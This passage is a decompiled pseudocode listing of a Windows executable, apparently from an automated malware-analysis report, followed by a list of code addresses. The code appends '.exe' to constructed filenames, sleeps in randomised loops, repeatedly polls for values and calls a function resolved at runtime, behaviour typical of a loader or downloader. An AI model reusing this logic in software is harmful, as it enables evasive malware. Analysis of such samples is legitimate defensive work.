																			}
																		}
																	}
																} else {
																	_t1633 = _v440;
																	_t1790 =  &(_t1784->nLength);
																	_t1328 = _t1633;
																	__eflags = _t1790 - 0x1000;
																	if(_t1790 < 0x1000) {
																		L107:
																		_push(_t1790);
																		E0040EDFF(_t1633);
																		_t1856 = _t1856 + 8;
																		goto L108;
																	} else {
																		_t1470 =  *((intOrPtr*)(_t1633 - 4));
																		_t1680 = _t1790 + 0x23;
																		__eflags = _t1328 -  *((intOrPtr*)(_t1633 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L107;
																		}
																	}
																}
															}
														} else {
															_t1634 = _v336;
															_t1741 =  &(1[_t1741]);
															_t1334 = _t1634;
															__eflags = _t1741 - 0x1000;
															if(_t1741 < 0x1000) {
																L97:
																_push(_t1741);
																E0040EDFF(_t1634);
																_t1856 = _t1856 + 8;
																goto L98;
															} else {
																_t1470 =  *((intOrPtr*)(_t1634 - 4));
																_t1680 = _t1741 + 0x23;
																__eflags = _t1334 -  *((intOrPtr*)(_t1634 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L347;
																} else {
																	goto L97;
																}
															}
														}
													} else {
														_t1635 = _v464;
														_t1791 =  &(_t1740->nLength);
														_t1338 = _t1635;
														__eflags = _t1791 - 0x1000;
														if(_t1791 < 0x1000) {
															L93:
															_push(_t1791);
															E0040EDFF(_t1635);
															_t1856 = _t1856 + 8;
															goto L94;
														} else {
															_t1470 =  *((intOrPtr*)(_t1635 - 4));
															_t1680 = _t1791 + 0x23;
															__eflags = _t1338 -  *((intOrPtr*)(_t1635 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L347;
															} else {
																goto L93;
															}
														}
													}
												} else {
													_t1636 = _v440;
													_t1792 =  &(_t1739->nLength);
													_t1342 = _t1636;
													__eflags = _t1792 - 0x1000;
													if(_t1792 < 0x1000) {
														L89:
														_push(_t1792);
														E0040EDFF(_t1636);
														_t1856 = _t1856 + 8;
														goto L90;
													} else {
														_t1470 =  *((intOrPtr*)(_t1636 - 4));
														_t1680 = _t1792 + 0x23;
														__eflags = _t1342 -  *((intOrPtr*)(_t1636 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L347;
														} else {
															goto L89;
														}
													}
												}
											} else {
												_push(_t1575);
												_t1354 = E0040C770( &_v464,  &_v408);
												_v28 = 5;
												_t1355 = E0040C990( &_v440, _t1354,  &_v360);
												_t1856 = _t1889 + 8;
												_t1640 = _t1355;
												_v28 = 6;
												_t1810 =  *(_t1640 + 0x14);
												_t1795 =  *(_t1640 + 0x10);
												__eflags = _t1810 - _t1795 - 4;
												if(_t1810 - _t1795 < 4) {
													_v412 = 0;
													_t1640 = E00402980(_t1412, _t1640, _t1810, _t1817, 4, _v412, ".exe", 4);
												} else {
													 *(_t1640 + 0x10) =  &(_t1795->lpSecurityDescriptor);
													_t1375 = _t1640;
													__eflags = _t1810 - 0x10;
													if(_t1810 >= 0x10) {
														_t1375 =  *_t1640;
													}
													 *((intOrPtr*)(_t1375 + _t1795)) = 0x6578652e;
													 *((char*)(_t1375 +  &(_t1795->lpSecurityDescriptor))) = 0;
												}
												 *_t1817 = 0;
												 *(_t1817 + 0x10) = 0;
												 *(_t1817 + 0x14) = 0;
												asm("movups xmm0, [ecx]");
												asm("movups [esi], xmm0");
												asm("movq xmm0, [ecx+0x10]");
												asm("movq [esi+0x10], xmm0");
												 *(_t1640 + 0x10) = 0;
												 *(_t1640 + 0x14) = 0xf;
												 *_t1640 = 0;
												_t1796 = _v420;
												__eflags = _t1796 - 0x10;
												if(_t1796 < 0x10) {
													L59:
													_t1797 = _v444;
													_v424 = 0;
													_v420 = 0xf;
													_v440 = 0;
													__eflags = _t1797 - 0x10;
													if(_t1797 < 0x10) {
														L63:
														_t1798 = _v340;
														_v448 = 0;
														_v444 = 0xf;
														_v464 = 0;
														__eflags = _t1798 - 0x10;
														if(_t1798 < 0x10) {
															L67:
															_t1799 = _v364;
															_v344 = 0;
															_v340 = 0xf;
															_v360 = 0;
															__eflags = _t1799 - 0x10;
															if(_t1799 < 0x10) {
																L71:
																_v368 = 0;
																_v364 = 0xf;
																_v384 = 0;
																L72:
																_t1680 = _v388;
																__eflags = _t1680 - 0x10;
																if(_t1680 < 0x10) {
																	L344:
																	 *[fs:0x0] = _v36;
																	_pop(_t1811);
																	_pop(_t1818);
																	__eflags = _v44 ^ _t1830;
																	return E0040EBBF(_t1817, _t1412, _v44 ^ _t1830, _t1680, _t1811, _t1818);
																} else {
																	_t1545 = _v408;
																	_t1680 =  &(1[_t1680]);
																	_t1069 = _t1545;
																	__eflags = _t1680 - 0x1000;
																	if(_t1680 < 0x1000) {
																		L307:
																		_push(_t1680);
																		E0040EDFF(_t1545);
																		goto L344;
																	} else {
																		_t1470 =  *((intOrPtr*)(_t1545 - 4));
																		_t1680 = _t1680 + 0x23;
																		__eflags = _t1069 -  *((intOrPtr*)(_t1545 - 4)) + 0xfffffffc - 0x1f;
																		if(__eflags > 0) {
																			goto L346;
																		} else {
																			goto L307;
																		}
																	}
																}
															} else {
																_t1609 = _v384;
																_t1763 = _t1799 + 1;
																_t1359 = _t1609;
																__eflags = _t1763 - 0x1000;
																if(_t1763 < 0x1000) {
																	L70:
																	_push(_t1763);
																	E0040EDFF(_t1609);
																	_t1856 = _t1856 + 8;
																	goto L71;
																} else {
																	_t1470 =  *((intOrPtr*)(_t1609 - 4));
																	_t1680 = _t1763 + 0x23;
																	__eflags = _t1359 -  *((intOrPtr*)(_t1609 - 4)) + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		goto L346;
																	} else {
																		goto L70;
																	}
																}
															}
														} else {
															_t1641 = _v360;
															_t1800 = _t1798 + 1;
															_t1362 = _t1641;
															__eflags = _t1800 - 0x1000;
															if(_t1800 < 0x1000) {
																L66:
																_push(_t1800);
																E0040EDFF(_t1641);
																_t1856 = _t1856 + 8;
																goto L67;
															} else {
																_t1470 =  *((intOrPtr*)(_t1641 - 4));
																_t1680 = _t1800 + 0x23;
																__eflags = _t1362 -  *((intOrPtr*)(_t1641 - 4)) + 0xfffffffc - 0x1f;
																if(__eflags > 0) {
																	goto L346;
																} else {
																	goto L66;
																}
															}
														}
													} else {
														_t1642 = _v464;
														_t1801 =  &(_t1797->nLength);
														_t1366 = _t1642;
														__eflags = _t1801 - 0x1000;
														if(_t1801 < 0x1000) {
															L62:
															_push(_t1801);
															E0040EDFF(_t1642);
															_t1856 = _t1856 + 8;
															goto L63;
														} else {
															_t1470 =  *((intOrPtr*)(_t1642 - 4));
															_t1680 = _t1801 + 0x23;
															__eflags = _t1366 -  *((intOrPtr*)(_t1642 - 4)) + 0xfffffffc - 0x1f;
															if(__eflags > 0) {
																goto L346;
															} else {
																goto L62;
															}
														}
													}
												} else {
													_t1643 = _v440;
													_t1802 =  &(_t1796->nLength);
													_t1370 = _t1643;
													__eflags = _t1802 - 0x1000;
													if(_t1802 < 0x1000) {
														L58:
														_push(_t1802);
														E0040EDFF(_t1643);
														_t1856 = _t1856 + 8;
														goto L59;
													} else {
														_t1470 =  *((intOrPtr*)(_t1643 - 4));
														_t1680 = _t1802 + 0x23;
														__eflags = _t1370 -  *((intOrPtr*)(_t1643 - 4)) + 0xfffffffc - 0x1f;
														if(__eflags > 0) {
															goto L346;
														} else {
															goto L58;
														}
													}
												}
											}
										} else {
											_t1644 = _v488;
											_t1735 = _t1735 + 1;
											_t1376 = _t1644;
											__eflags = _t1735 - 0x1000;
											if(_t1735 < 0x1000) {
												L48:
												_push(_t1735);
												E0040EDFF(_t1644);
												_t1856 = _t1856 + 8;
												goto L49;
											} else {
												_t1470 =  *((intOrPtr*)(_t1644 - 4));
												_t1680 = _t1735 + 0x23;
												__eflags = _t1376 -  *((intOrPtr*)(_t1644 - 4)) + 0xfffffffc - 0x1f;
												if(__eflags > 0) {
													goto L345;
												} else {
													goto L48;
												}
											}
										}
									} else {
										_t1645 = _v440;
										_t1803 =  &(_t1734->nLength);
										_t1381 = _t1645;
										__eflags = _t1803 - 0x1000;
										if(_t1803 < 0x1000) {
											L44:
											_push(_t1803);
											E0040EDFF(_t1645);
											_t1856 = _t1856 + 8;
											goto L45;
										} else {
											_t1470 =  *((intOrPtr*)(_t1645 - 4));
											_t1680 = _t1803 + 0x23;
											__eflags = _t1381 -  *((intOrPtr*)(_t1645 - 4)) + 0xfffffffc - 0x1f;
											if(__eflags > 0) {
												L345:
												E00413527(_t1412, _t1680, __eflags);
												L346:
												E00413527(_t1412, _t1680, __eflags);
												L347:
												E00413527(_t1412, _t1680, __eflags);
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t1830);
												_t1832 = _t1856;
												_push(0xffffffff);
												_push(0x42ca27);
												_push( *[fs:0x0]);
												_t1864 = _t1856 - 0x4dc;
												_t949 =  *0x43d054; // 0x7bd02ead
												_t950 = _t949 ^ _t1832;
												_v628 = _t950;
												_push(_t1412);
												_push(_t1817);
												_push(_t1810);
												_push(_t950);
												 *[fs:0x0] =  &_v624;
												_v616 = 0;
												_t952 = E00405F40(_t1412, _t1810); // executed
												_t1414 = Sleep;
												__eflags = _t952;
												if(__eflags != 0) {
													_t1817 = 0x7d0;
													do {
														_t1039 = E00417DF6(_t1470, __eflags);
														asm("cdq");
														_t1680 = _t1039 % 0x7d0 + 0x3e8;
														Sleep(_t1039 % 0x7d0 + 0x3e8);
														__eflags = E00405F40(Sleep, _t1810);
													} while (__eflags != 0);
												}
												E00401960( &_v772, "1"); // executed
												_v32 = 1;
												_t956 = E00402510( &_v1164, E0040B8F0(E00409340(_t1414, _t1680, _t1810, _t1817)));
												_v32 = 2;
												_t959 = E00402510( &_v1140, E0040B800(E00409290(_t1680, _t956, _t1817)));
												_v32 = 3;
												L385();
												_t961 = E00402510( &_v1284, E0040B7D0(_t959));
												_v32 = 4;
												_t962 = E0040C930( &_v1260, 0x450e3c, _t961);
												_v32 = 5;
												_t963 = E0040C990( &_v1236, _t962,  &_v20);
												_v32 = 6;
												_t964 = E0040CA40( &_v1212, _t963, _t959);
												_v32 = 7;
												_t965 = E0040CA40( &_v1188, _t964, _t956);
												_v32 = 8;
												E0040C990( &_v116, _t965, 0x450e24);
												_t1870 = _t1864 - 0x10 + 0x14;
												E00402440(_t1414,  &_v1188);
												E00402440(_t1414,  &_v1212);
												E00402440(_t1414,  &_v1236);
												E00402440(_t1414,  &_v1260);
												E00402440(_t1414,  &_v1284);
												E00402440(_t1414,  &_v1140);
												_v32 = 0x10;
												E00402440(_t1414,  &_v1164);
												_t1820 = 0;
												__eflags = 0;
												_t1813 = 0xc8;
												while(1) {
													_t1820 =  &(1[_t1820]);
													_t974 = E00402400( &_v116);
													_t1492 =  &_v772;
													_t975 = E00402300(_t1414,  &_v772, _t1813, _t974); // executed
													__eflags = _t975;
													if(_t975 == 0) {
														goto L356;
													}
													E00402510( &_v68, E00402370( &_v772));
													_t1692 = "0";
													_t984 = E00402800( &_v68, "0");
													__eflags = _t984;
													if(_t984 == 0) {
														_t1692 = "1";
														_t1037 = E00402800( &_v68, "1");
														__eflags = _t1037;
														if(_t1037 == 0) {
															_t1492 =  &_v68;
															E00402440(_t1414,  &_v68);
															goto L356;
														}
													}
													E00402440(_t1414,  &_v68);
													E0040BB70( &_v92);
													_t1871 = _t1870 - 0x10;
													_v32 = 0x11;
													E00401960( &_v1100, "0"); // executed
													_v32 = 0x12;
													while(1) {
														_t990 = E00402510( &_v1140, E0040B8C0(E004093D0(_t1414, _t1692, _t1813, _t1820)));
														_t1692 = 0x450e54;
														_v32 = 0x15;
														_t991 = E0040C930( &_v1164, 0x450e54, _t990);
														_t1871 = _t1871 + 4;
														_v32 = 0x16;
														_t993 = E00402300(_t1414,  &_v1100, _t1813, E00402400(_t991)); // executed
														_t1820 = _t993;
														E00402440(_t1414,  &_v1164);
														_v32 = 0x12;
														E00402440(_t1414,  &_v1140);
														__eflags = _t993;
														if(_t993 == 0) {
															goto L363;
														}
														E00402410( &_v92, E00402370( &_v1100));
														_t998 = E004023F0( &_v92);
														__eflags = _t998 - 0xa;
														if(_t998 <= 0xa) {
															goto L363;
														}
														__eflags = _t998 - 0x64;
														if(_t998 >= 0x64) {
															goto L363;
														}
														_t1872 = _t1871 - 0x10;
														_t1821 = 0;
														__eflags = 0;
														E00401960( &_v444, "1"); // executed
														_v32 = 0x17;
														do {
															_v1116 = _t1821 + 1;
															_t1002 = E00402510( &_v1140, E0040B7A0(E00409460(_t1692, _t1813, _t1821 + 1)));
															_t1692 = 0x450e54;
															_v32 = 0x1a;
															_t1003 = E0040C930( &_v1164, 0x450e54, _t1002);
															_t1872 = _t1872 + 4;
															_v32 = 0x1b;
															_t1005 = E00402300(_t1414,  &_v444, _t1813, E00402400(_t1003)); // executed
															E00402440(_t1414,  &_v1164);
															_v32 = 0x17;
															E00402440(_t1414,  &_v1140);
															__eflags = _t1005;
															if(_t1005 == 0) {
																goto L368;
															} else {
																_t1414 = E00402380( &_v444);
																__eflags = _t1414 - 0x16;
																if(__eflags <= 0) {
																	goto L368;
																} else {
																	_push( ~(0 | __eflags > 0x00000000) |  &(1[_t1414]));
																	_t1021 = E004162EE();
																	_t824 =  &(1[_t1414]); // 0x1
																	_t1813 = _t1021;
																	_t1022 = E00402340( &_v444, _t1021, _t824);
																	_push( ~(0 | __eflags > 0x00000000) | _t1414 * 0x00000002); // executed
																	_t1025 = E004162EE(); // executed
																	_t1878 = _t1872 + 4 - 0x14;
																	_v1104 = _t1025;
																	E0040BB90(_t1414, _t1878, _t1414 * 2 >> 0x20, _t1021,  &_v92);
																	_push( &_v1104);
																	_t1029 = E00403770(_t1414, _t1021, _t1022, _t1813); // executed
																	_t1692 = _t1029;
																	_t1030 = E00402B60(_v1104, _t1029, __eflags,  &_v1112,  &_v1112); // executed
																	_t1872 = _t1878 + 0x24;
																	_v1108 = _t1030;
																	__eflags = _v1112;
																	if(_v1112 != 0) {
																		_t1813 = Sleep;
																		_t1821 = 0;
																		_v1104 = 0;
																		_t1414 = 0;
																		__eflags = 0;
																		do {
																			_t1535 = _v1108(E00402400(0x450e6c), E00402400(0x450df4));
																			_t1872 = _t1872 + 8;
																			_t1034 = _v1104;
																			_t1692 = 1;
																			__eflags = _t1034;
																			if(_t1034 != 0) {
																				__eflags = _t1535;
																				_t1414 =  ==  ? 1 : _t1414 & 0x000000ff;
																			}
																			__eflags = _t1821 - 0xa;
																			if(_t1821 >= 0xa) {
																				__eflags = _t1535 - 1;
																				_t1414 =  !=  ? _t1692 : _t1414 & 0x000000ff;
																			}
																			__eflags = _t1821 - 0xf;
																			if(_t1821 < 0xf) {
																				__eflags = _t1821 - 5;
																				if(_t1821 < 5) {
																					goto L381;
																				} else {
																					goto L379;
																				}
																			} else {
																				__eflags = _t1535 - 1;
																				if(_t1535 == 1) {
																					_t1414 = _t1535;
																				}
																				L379:
																				__eflags = _t1034;
																				if(_t1034 != 0) {
																					goto L381;
																				} else {
																					__eflags = _t1535 - 0xfffffffe;
																					if(__eflags == 0) {
																						Sleep(0x7d0); // executed
																					} else {
																						goto L381;
																					}
																				}
																			}
																			goto L384;
																			L381:
																			__eflags = _t1535 - 1;
																			_t1036 =  ==  ? _t1692 : _t1034 & 0x000000ff;
																			_t1821 = _t1821 + 1;
																			_v1104 =  ==  ? _t1692 : _t1034 & 0x000000ff;
																			Sleep(0x7d0); // executed
																			__eflags = _t1414;
																		} while (__eflags == 0);
																	} else {
																		goto L368;
																	}
																}
															}
															L384:
															E004054C0(_t1414, __eflags); // executed
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t1832);
															_t1833 = _t1872;
															_t1009 =  *0x43d054; // 0x7bd02ead
															_v1892 = _t1009 ^ _t1833;
															_v1908 = 0x5a405b41;
															_v1904 = 0x5e465e00;
															_v1900 = 0x4c5b5d11;
															_t1517 =  *( *[fs:0x2c]);
															_t1012 =  *0x450f38; // 0x80000017
															_v1896 = 0x2e13;
															__eflags = _t1012 -  *((intOrPtr*)(_t1517 + 4));
															if(_t1012 >  *((intOrPtr*)(_t1517 + 4))) {
																E0040EF48(_t1012, 0x450f38);
																__eflags =  *0x450f38 - 0xffffffff;
																if(__eflags == 0) {
																	asm("movaps xmm0, [0x439d70]");
																	asm("movups [0x450db0], xmm0");
																	 *0x450dc8 = _v44;
																	asm("movq xmm0, [ebp-0x14]");
																	asm("movq [0x450dc0], xmm0");
																	 *0x450dcc = _v40;
																	E0040F25B(_t1517, __eflags, 0x42d490);
																	E0040EEFE(0x450f38);
																}
															}
															__eflags = _v36 ^ _t1833;
															return E0040EBBF(0x450db0, _t1414, _v36 ^ _t1833, _t1692, _t1813, _t1821);
															goto L389;
															L368:
															_t1821 = _v1116;
															__eflags = _t1821 - 0xa;
														} while (__eflags < 0);
														goto L384;
														L363:
														Sleep(0xbb8);
													}
													L356:
													__eflags = _t1820 - 0x12c;
													if(__eflags <= 0) {
														_t793 = _t1820 + 3; // 0x4
														Sleep(_t793 * 0x3e8);
													} else {
														_t978 = E00417DF6(_t1492, __eflags);
														asm("cdq");
														Sleep((_t978 % _t1813 + 0x67) * 0x3e8);
													}
												}
											} else {
												goto L44;
											}
										}
									}
								}
							} else {
								goto L25;
							}
						}
					}
				}
				L389:
			}

0x00406800
0x00406800
0x00406800
0x00406800
0x00406801
0x00406809
0x00406810
0x00406814
0x00406816
0x00406818
0x00406823
0x00406824
0x00406825
0x00406828
0x00406829
0x00406830
0x00406834
0x0040683a
0x0040684a
0x0040684f
0x00406857
0x0040686a
0x00406871
0x00406879
0x00406883
0x00406888
0x0040688b
0x0040688d
0x00406891
0x00406896
0x0040689e
0x004068c4
0x004068d2
0x004068a0
0x004068a3
0x004068a6
0x004068ab
0x004068ad
0x004068ad
0x004068af
0x004068b6
0x004068b6
0x004068d4
0x004068df
0x004068e3
0x004068e8
0x004068ed
0x004068f4
0x004068fb
0x00406902
0x00406907
0x0040690c
0x0040690f
0x00406912
0x00406917
0x00406945
0x00406945
0x00406948
0x0040694f
0x00406956
0x0040695d
0x0040698b
0x0040698b
0x0040698e
0x00406995
0x0040699c
0x004069a3
0x004069d1
0x004069d1
0x004069d8
0x004069df
0x004069e3
0x004069e5
0x00000000
0x004069e7
0x004069f4
0x004069f9
0x004069fa
0x004069ff
0x00406a02
0x00406a02
0x00000000
0x004069a5
0x004069a5
0x004069a8
0x004069a9
0x004069b1
0x004069c7
0x004069c7
0x004069c9
0x004069ce
0x00000000
0x004069b3
0x004069b3
0x004069b6
0x004069c1
0x00000000
0x00000000
0x00000000
0x00000000
0x004069c1
0x004069b1
0x0040695f
0x0040695f
0x00406962
0x00406963
0x0040696b
0x00406981
0x00406981
0x00406983
0x00406988
0x00000000
0x0040696d
0x0040696d
0x00406970
0x0040697b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040697b
0x0040696b
0x00406919
0x00406919
0x0040691c
0x0040691d
0x00406925
0x0040693b
0x0040693b
0x0040693d
0x00406942
0x00000000
0x00406927
0x00406927
0x0040692a
0x00406935
0x00406a94
0x00406a94
0x00000000
0x00000000
0x00000000
0x00000000
0x00406935
0x00406925
0x00406a08
0x00406a08
0x00406a08
0x00406a0c
0x00406a0c
0x00406a12
0x00406a3c
0x00406a3c
0x00406a3f
0x00406a46
0x00406a4d
0x00406a54
0x00406a7e
0x00406a84
0x00406a93
0x00406a56
0x00406a56
0x00406a59
0x00406a5a
0x00406a62
0x00406a74
0x00406a74
0x00406a76
0x00000000
0x00406a64
0x00406a64
0x00406a67
0x00406a72
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a72
0x00406a62
0x00406a14
0x00406a14
0x00406a17
0x00406a18
0x00406a20
0x00406a32
0x00406a32
0x00406a34
0x00406a39
0x00000000
0x00406a22
0x00406a22
0x00406a22
0x00406a25
0x00406a30
0x00406a99
0x00406a99
0x00406a9e
0x00406a9f
0x00406aa0
0x00406aa1
0x00406aa9
0x00406aac
0x00406ab0
0x00406ab4
0x00406ab6
0x00406ab8
0x00406ac3
0x00406ac4
0x00406ac5
0x00406acb
0x00406ad0
0x00406ad2
0x00406ad5
0x00406ad6
0x00406ad7
0x00406adb
0x00406ae1
0x00406ae3
0x00406ae9
0x00406aef
0x00406af9
0x00406b03
0x00406b0d
0x00406b14
0x00406b1b
0x00406b20
0x00406b22
0x00407e4e
0x00407e53
0x00407e57
0x00407e5c
0x00407e6d
0x00407e72
0x00407e7c
0x00407e83
0x00407e85
0x00407e8a
0x00407e90
0x00407e97
0x00407e9c
0x00407e9f
0x00407ea6
0x00407ea8
0x00407eba
0x00407ec1
0x00407ec6
0x00407ed3
0x00407ed8
0x00407ed8
0x00407ea6
0x00407edb
0x00407ee0
0x00407ee2
0x00407ee4
0x00407eed
0x00407ef4
0x00407ef8
0x00407efd
0x00407efd
0x00407f04
0x00407f09
0x00407f13
0x00407f1d
0x00407f27
0x00407f2e
0x00407f2e
0x00407f31
0x00407f31
0x00407f33
0x00407f34
0x00407f34
0x00407f46
0x00407f4b
0x00407f4f
0x00407f57
0x00407f5f
0x00407f62
0x00407f92
0x00407fa7
0x00407f64
0x00407f64
0x00407f67
0x00407f6a
0x00407f76
0x00407f7d
0x00407f83
0x00407f83
0x00407fac
0x00407fb6
0x00407fc0
0x00407fca
0x00407fcd
0x00407fd4
0x00407fd9
0x00407fe1
0x00407fe8
0x00407fef
0x00407ff8
0x00408009
0x0040800e
0x00408018
0x0040801d
0x00408023
0x00408026
0x00408057
0x00408057
0x0040805b
0x00408061
0x0040806b
0x00408075
0x0040807c
0x0040807f
0x004080b0
0x004080b0
0x004080b4
0x004080ba
0x004080c4
0x004080ce
0x004080d5
0x004080d8
0x00408109
0x00408109
0x00408114
0x0040811b
0x00408120
0x00408123
0x0040812d
0x00408130
0x00408135
0x00408139
0x0040813e
0x00408141
0x00408143
0x00408356
0x0040835b
0x00408365
0x0040836f
0x00408379
0x00408382
0x00408389
0x0040838f
0x00408396
0x0040839b
0x0040839e
0x004083a5
0x004083ad
0x004083b5
0x004083c1
0x004083d2
0x004083da
0x004083df
0x004083ec
0x004083f1
0x004083f1
0x004083a5
0x004083f4
0x004083fb
0x004083fd
0x004083fd
0x00408400
0x00408400
0x00408407
0x00408408
0x00408408
0x00408400
0x0040840d
0x00408412
0x0040841c
0x00408426
0x00408430
0x00408437
0x00408437
0x0040843a
0x00408440
0x00408440
0x00408442
0x00408443
0x00408443
0x00408455
0x0040845a
0x0040845e
0x00408466
0x0040846e
0x00408471
0x004084a1
0x004084b6
0x00408473
0x00408473
0x00408476
0x00408479
0x00408485
0x0040848c
0x00408492
0x00408492
0x004084bb
0x004084c5
0x004084cf
0x004084d9
0x004084dc
0x004084e3
0x004084e8
0x004084f0
0x004084f7
0x004084fe
0x00408507
0x00408518
0x0040851d
0x00408527
0x0040852c
0x00408532
0x00408535
0x00408566
0x00408566
0x0040856a
0x00408570
0x0040857a
0x00408584
0x0040858b
0x0040858e
0x004085bf
0x004085bf
0x004085c3
0x004085c9
0x004085d3
0x004085dd
0x004085e4
0x004085e7
0x00408618
0x00408618
0x00408623
0x0040862a
0x0040862f
0x00408632
0x0040863c
0x0040863f
0x00408644
0x00408648
0x0040864d
0x00408650
0x00408652
0x00408878
0x0040887d
0x00408887
0x00408891
0x00408897
0x0040889e
0x004088a3
0x004088a6
0x004088ad
0x004088c0
0x004088c5
0x004088cb
0x004088d8
0x004088dd
0x004088dd
0x004088ad
0x004088e0
0x004088e5
0x004088e7
0x004088e9
0x004088f0
0x004088f7
0x004088fe
0x00408905
0x0040890c
0x00408913
0x0040891a
0x0040891a
0x0040891c
0x0040891c
0x00408921
0x00408926
0x00408930
0x0040893a
0x00408944
0x0040894b
0x0040894b
0x00408950
0x00408950
0x00408952
0x00408953
0x00408953
0x00408965
0x0040896a
0x0040896e
0x00408976
0x0040897e
0x00408981
0x004089b1
0x004089c6
0x00408983
0x00408983
0x00408986
0x00408989
0x00408995
0x0040899c
0x004089a2
0x004089a2
0x004089cb
0x004089d5
0x004089df
0x004089e9
0x004089ec
0x004089f3
0x004089f8
0x00408a00
0x00408a07
0x00408a0e
0x00408a17
0x00408a28
0x00408a2d
0x00408a37
0x00408a3c
0x00408a42
0x00408a45
0x00408a76
0x00408a76
0x00408a7a
0x00408a80
0x00408a8a
0x00408a94
0x00408a9b
0x00408a9e
0x00408acf
0x00408acf
0x00408ad3
0x00408ad9
0x00408ae3
0x00408aed
0x00408af4
0x00408af7
0x00408b28
0x00408b28
0x00408b33
0x00408b3a
0x00408b3f
0x00408b42
0x00408b4c
0x00408b4f
0x00408b54
0x00408b58
0x00408b5d
0x00408b60
0x00408b62
0x00408c9a
0x00408ca5
0x00408ca9
0x00000000
0x00408b68
0x00408b68
0x00408b75
0x00408b83
0x00408b90
0x00408b95
0x00408b98
0x00408b9a
0x00408b9e
0x00408ba3
0x00408ba8
0x00408bab
0x00408bd1
0x00408be5
0x00408bad
0x00408bb0
0x00408bb3
0x00408bb5
0x00408bb8
0x00408bba
0x00408bba
0x00408bbc
0x00408bc3
0x00408bc3
0x00408be7
0x00408bed
0x00408bf4
0x00408bfb
0x00408bfe
0x00408c01
0x00408c06
0x00408c0b
0x00408c12
0x00408c19
0x00408c1c
0x00408c22
0x00408c25
0x00408c56
0x00408c5c
0x00408c66
0x00408c70
0x00408c77
0x00408c82
0x00408c8d
0x00000000
0x00408c27
0x00408c27
0x00408c2d
0x00408c2e
0x00408c30
0x00408c36
0x00408c4c
0x00408c4c
0x00408c4e
0x00000000
0x00408c38
0x00408c38
0x00408c3b
0x00408c43
0x00408c46
0x00000000
0x00000000
0x00000000
0x00000000
0x00408c46
0x00408c36
0x00408c25
0x00408af9
0x00408af9
0x00408aff
0x00408b00
0x00408b02
0x00408b08
0x00408b1e
0x00408b1e
0x00408b20
0x00408b25
0x00000000
0x00408b0a
0x00408b0a
0x00408b0d
0x00408b15
0x00408b18
0x00000000
0x00000000
0x00000000
0x00000000
0x00408b18
0x00408b08
0x00408aa0
0x00408aa0
0x00408aa6
0x00408aa7
0x00408aa9
0x00408aaf
0x00408ac5
0x00408ac5
0x00408ac7
0x00408acc
0x00000000
0x00408ab1
0x00408ab1
0x00408ab4
0x00408abc
0x00408abf
0x00000000
0x00000000
0x00000000
0x00000000
0x00408abf
0x00408aaf
0x00408a47
0x00408a47
0x00408a4d
0x00408a4e
0x00408a50
0x00408a56
0x00408a6c
0x00408a6c
0x00408a6e
0x00408a73
0x00000000
0x00408a58
0x00408a58
0x00408a5b
0x00408a63
0x00408a66
0x00000000
0x00000000
0x00000000
0x00000000
0x00408a66
0x00408a56
0x00408658
0x00408658
0x00408665
0x00408673
0x00408680
0x00408685
0x00408688
0x0040868a
0x0040868e
0x00408693
0x00408698
0x0040869b
0x004086c1
0x004086d5
0x0040869d
0x004086a0
0x004086a3
0x004086a5
0x004086a8
0x004086aa
0x004086aa
0x004086ac
0x004086b3
0x004086b3
0x004086d7
0x004086dd
0x004086e4
0x004086eb
0x004086ee
0x004086f1
0x004086f6
0x004086fb
0x00408702
0x00408709
0x0040870c
0x00408712
0x00408715
0x00408746
0x00408746
0x0040874c
0x00408756
0x00408760
0x00408767
0x0040876a
0x0040879b
0x0040879b
0x004087a1
0x004087ab
0x004087b5
0x004087bc
0x004087bf
0x004087f0
0x004087f0
0x004087f6
0x00408800
0x0040880a
0x00408811
0x00408814
0x00000000
0x0040881a
0x0040881a
0x00408820
0x00408821
0x00408823
0x00408829
0x0040883f
0x0040883f
0x00408841
0x00408846
0x00408849
0x00408853
0x0040885d
0x00000000
0x0040882b
0x0040882b
0x0040882e
0x00408836
0x00408839
0x00000000
0x00000000
0x00000000
0x00000000
0x00408839
0x00408829
0x004087c1
0x004087c1
0x004087c7
0x004087c8
0x004087ca
0x004087d0
0x004087e6
0x004087e6
0x004087e8
0x004087ed
0x00000000
0x004087d2
0x004087d2
0x004087d5
0x004087dd
0x004087e0
0x00000000
0x00000000
0x00000000
0x00000000
0x004087e0
0x004087d0
0x0040876c
0x0040876c
0x00408772
0x00408773
0x00408775
0x0040877b
0x00408791
0x00408791
0x00408793
0x00408798
0x00000000
0x0040877d
0x0040877d
0x00408780
0x00408788
0x0040878b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040878b
0x0040877b
0x00408717
0x00408717
0x0040871d
0x0040871e
0x00408720
0x00408726
0x0040873c
0x0040873c
0x0040873e
0x00408743
0x00000000
0x00408728
0x00408728
0x0040872b
0x00408733
0x00408736
0x00000000
0x00000000
0x00000000
0x00000000
0x00408736
0x00408726
0x00408715
0x004085e9
0x004085e9
0x004085ef
0x004085f0
0x004085f2
0x004085f8
0x0040860e
0x0040860e
0x00408610
0x00408615
0x00000000
0x004085fa
0x004085fa
0x004085fd
0x00408605
0x00408608
0x00000000
0x00000000
0x00000000
0x00000000
0x00408608
0x004085f8
0x00408590
0x00408590
0x00408596
0x00408597
0x00408599
0x0040859f
0x004085b5
0x004085b5
0x004085b7
0x004085bc
0x00000000
0x004085a1
0x004085a1
0x004085a4
0x004085ac
0x004085af
0x00000000
0x00000000
0x00000000
0x00000000
0x004085af
0x0040859f
0x00408537
0x00408537
0x0040853d
0x0040853e
0x00408540
0x00408546
0x0040855c
0x0040855c
0x0040855e
0x00408563
0x00000000
0x00408548
0x00408548
0x0040854b
0x00408553
0x00408556
0x00000000
0x00000000
0x00000000
0x00000000
0x00408556
0x00408546
0x00408149
0x00408149
0x00408156
0x00408164
0x00408171
0x00408176
0x00408179
0x0040817b
0x0040817f
0x00408184
0x00408189
